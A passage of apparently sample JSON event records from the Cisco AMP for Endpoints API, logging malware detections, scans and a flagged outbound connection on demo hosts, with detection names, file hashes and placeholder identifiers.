Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6156292777899458567","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292777899459000,"timestamp":1610704866,"timestamp_nanoseconds":98000000,"date":"2021-01-15T10:01:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","detection_id":"6156292773604491270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292777899459000,"timestamp":1610704866,"timestamp_nanoseconds":82000000,"date":"2021-01-15T10:01:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292773604491269","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292777899459000,"timestamp":1610704866,"timestamp_nanoseconds":51000000,"date":"2021-01-15T10:01:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","detection_id":"6156292773604491268","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292773604491000,"timestamp":1610704865,"timestamp_nanoseconds":708000000,"date":"2021-01-15T10:01:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","detection_id":"6156292773604491267","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292773604491000,"timestamp":1610704865,"timestamp_nanoseconds":427000000,"date":"2021-01-15T10:01:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","detection_id":"6156292773604491266","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"},"parent":{"process_id":3660,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156208003834970000,"timestamp":1610704859,"timestamp_nanoseconds":47000000,"date":"2021-01-15T10:00:59+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156208003834970125","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292743539720000,"timestamp":1610704858,"timestamp_nanoseconds":969000000,"date":"2021-01-15T10:00:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","detection_id":"6156292734949785601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"},"parent":{"process_id":3660,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254780868919000,"timestamp":1610704856,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:00:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176254780868919310","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832363247763718000,"timestamp":1610704849,"timestamp_nanoseconds":734000000,"date":"2021-01-15T10:00:49+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2457,"scanned_processes":40,"scanned_paths":0,"malicious_detections":0}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254733624279000,"timestamp":1610704845,"timestamp_nanoseconds":320000000,"date":"2021-01-15T10:00:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176254733624279053","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207939410461000,"timestamp":1610704844,"timestamp_nanoseconds":773000000,"date":"2021-01-15T10:00:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207939410460684","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832265962459496000,"timestamp":1610704840,"timestamp_nanoseconds":622000000,"date":"2021-01-15T10:00:40+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":1460,"scanned_processes":24,"scanned_paths":0,"malicious_detections":0}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6532892466943623000,"timestamp":1610704839,"timestamp_nanoseconds":336000000,"date":"2021-01-15T10:00:39+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2280,"scanned_processes":41,"scanned_paths":0,"malicious_detections":0}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207909345690000,"timestamp":1610704837,"timestamp_nanoseconds":4000000,"date":"2021-01-15T10:00:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207909345689611","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899987000600,"timestamp":1610704833,"timestamp_nanoseconds":987000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.Ramnit.A","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704833,"start_date":"2021-01-15T10:00:33+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c"},"parent":{"disposition":"Clean","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659320741233000,"timestamp":1610704833,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:00:33+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826659320741232644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"dirty_url":"http://benhomelandefit.com/rssnews.php","remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1095,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":2800,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659320741233000,"timestamp":1610704833,"timestamp_nanoseconds":132000000,"date":"2021-01-15T10:00:33+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826659320741232643","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1095,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":2800,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254682084671000,"timestamp":1610704833,"timestamp_nanoseconds":542000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176254682084671500","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254682084671000,"timestamp":1610704833,"timestamp_nanoseconds":526000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176254682084671499","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254682084671000,"timestamp":1610704833,"timestamp_nanoseconds":370000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176254682084671498","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254682084671000,"timestamp":1610704833,"timestamp_nanoseconds":261000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254682084671497","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254682084671000,"timestamp":1610704833,"timestamp_nanoseconds":214000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat 